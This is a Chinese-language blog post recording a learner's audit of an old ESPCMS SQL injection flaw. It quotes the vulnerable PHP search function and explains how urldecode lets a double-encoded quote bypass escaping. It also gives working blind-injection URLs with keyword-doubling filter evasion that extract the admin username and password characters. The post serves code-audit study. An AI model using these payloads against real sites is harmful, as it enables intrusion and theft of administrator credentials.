审计espcms注入漏洞
正在学习代码审计,动手审计了一下seay在2013年发现的espcms注入漏洞,记录下来:
主要问题函数为interface/search.php中的in_taglist()函数:
function in_taglist() {
parent::start_pagetemplate();
include_once admin_ROOT . 'public/class_pagebotton.php';
$page = $this->fun->accept('page', 'G');
$page = isset($page) ? intval($page) : 1;
$lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
$tagkey = urldecode($this->fun->accept('tagkey', 'R'));
$db_where = ' WHERE lng=\'' . $lng . '\' AND isclass=1';
if (empty($tagkey)) {
$linkURL = $_SERVER['HTTP_REFERER'];
$this->callmessage($this->lng['search_err'], $linkURL, $this->lng['gobackbotton']);
}
if (!empty($tagkey)) {
$db_where.=" AND FIND_IN_SET('$tagkey',tags)";
}
$pagemax = 20;
$pagesylte = 1;
$templatesDIR = $this->get_templatesdir('article');
$templatefilename = $lng . '/' . $templatesDIR . '/search';
$db_table = db_prefix . 'document';
$countnum = $this->db_numrows($db_table, $db_where);
if ($countnum > 0) {
$numpage = ceil($countnum / $pagemax);
} else {
$numpage = 1;
}
$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,
color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
$this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], $this->CON['is_rewrite']);
$sql = $this->htmlpage->PageSQL('pid,did', 'down');
$rs = $this->db->query($sql);
while ($rsList = $this->db->fetch_assoc($rs)) {
$rsList['typename'] = $this->get_type($rsList['tid'], 'typename');
$rsList['link'] = $this->get_link('doc', $rsList, admin_LNG);
$rsList['buylink'] = $this->get_link('buylink', $rsList, admin_LNG);
$rsList['enqlink'] = $this->get_link('enqlink', $rsList, admin_LNG);
$rsList['ctitle'] = empty($rsList['color']) ? $rsList['title'] : "" . $rsList['title'] . "";
$rsList[$keyname] = str_ireplace($keyword, '' . $keyword . '', $rsList[$keyname]);
$array[] = $rsList;
}
$this->pagetemplate->assign('pagetext', $this->htmlpage->PageStat($this->lng['pagetext']));
$this->pagetemplate->assign('pagebotton', $this->htmlpage->PageList());
$this->pagetemplate->assign('pagenu', $this->htmlpage->Bottonstyle(false));
$this->pagetemplate->assign('pagese', $this->htmlpage->pageSelect());
$this->pagetemplate->assign('pagevt', $this->htmlpage->Prevbotton());
$this->pagetemplate->assign('array', $array);
$this->pagetemplate->assign('path', 'search');
unset($array, $typeread, $modelview, $LANPACK, $this->lng);
$this->pagetemplate->display($templatefilename, 'search', false, $filename, admin_LNG);
}
主要代码:
$tagkey = urldecode($this->fun->accept('tagkey', 'R'));$db_where.=" AND FIND_IN_SET('$tagkey',tags)";$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,
color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
$tagkey变量使用了urldecode,可以绕过GPC,最终$tagkey被带入SQL语句。
漏洞测试EXP:http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=a%2527
猜解用户名长度:
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 1=(seselectlect length(username) frfromom espcms_admin_member limit 1) limit 1– by seay爆破用户名和密码:
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by seay
最近才接触代码审计,看的眼疼。